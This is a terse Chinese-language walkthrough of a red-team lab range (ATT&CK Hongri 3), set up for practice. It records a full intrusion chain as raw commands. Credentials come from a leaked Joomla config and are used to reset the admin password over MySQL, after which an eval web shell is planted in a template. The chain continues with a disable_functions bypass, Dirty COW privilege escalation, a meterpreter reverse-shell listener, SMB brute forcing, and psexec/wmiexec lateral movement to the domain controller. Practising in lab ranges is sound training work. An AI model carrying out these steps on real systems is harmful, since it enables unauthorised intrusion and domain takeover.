ATT&CK 红日靶场(三)-简记
Step 1-》信息收集
端口
nmap -p -A -sV 192.168.1.110
目录
dirsearch -u 192.168.1.110 --exelude-status 400,401,403,404,501,503
访问 ip/1.php -->根目录、禁用函数
ip/robots.txt
!!!-------
IP/administrator-->>joomla-cms
IP/configuration.php~-->>发现 testuser / cvcvgjASD!@
Step》--》MySQL
mysql -h 192.168.1.110 -u testuser -p
->am2zu_users->select *from am2zu_users;
更改密码->>123456
update am2zu_users set password = md5("123456") where id =891;
----》登录CMS
------------
Step 》写马->>eval($_POST['123']);
-》访问error.php
192.168.1.110/templates/beez3/error.php
STEP 》》
--antsward 连接后无法执行命令:
antsward-》加载插件-》辅助工具-》绕过disable_fuctions-》PHP7_GC_UAF 、PHP7_Backtrace_UAF
disable_functions 插件绕过
GitHub - yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD: bypass disable_functions via LD_PRELOA (no need /usr/sbin/sendmail)
-> 命令执行成功
ifconfig
whoami
uname -a
文件泄露-》tmp/mysql/test.txt--》adduser/passwd、wwwuser/wwwuser_123Aqx
-------
权限提升-漏洞
登录ssh成功
ssh -oHostKeyAlgorithms=+ssh-dss [email protected]
本地->git clone CVE-2016-5195
---》将dirty.c 下载到目标host
--》gcc -pthread dirty.c -o dirty -lcrypt //编译
--》rm /tmp/passwd.bak //删除之前做过的文件
--》./dirty 123456 //执行脚本,添加用户密码
MSFvenom -》shell.elf --> chmod +x shell.elf -->
监听:
mfs-exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.106
set lport 6666
run
内网渗透
# 添加路由
run autotoute -s 192.168.93.0/24
探测主机
use auxiliary/scanner/smc/smb_version
set rhosts 192.168.93.0/24
run
----》发现192.168.93.10 WIN-8GA56TNV3MV
----》192.168.93.20 WIN2008
----》WIN7
本地配置代理
use auxiliary/scanner/smb/smb_login 爆破smb 192.168.93.30
proxychains hydra -l admin -P ./pass.txt 192.168.93.20 爆破 192.168.93.20
---------------------------------
psexec攻击
192.168.93.30
use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
set SMBUser admin
set SMBPass 123456
set rhost 192.168.93.30
run
------------------
查找域控
run post/windows/gather/enum_domain
------
impacket包里的vmiexec.py攻击192.168.93.20
proxychains python3 wmiexec.py 'admin:[email protected]'
攻击域控:
proxychains python3 wmiexec.py 'administrator:[email protected]'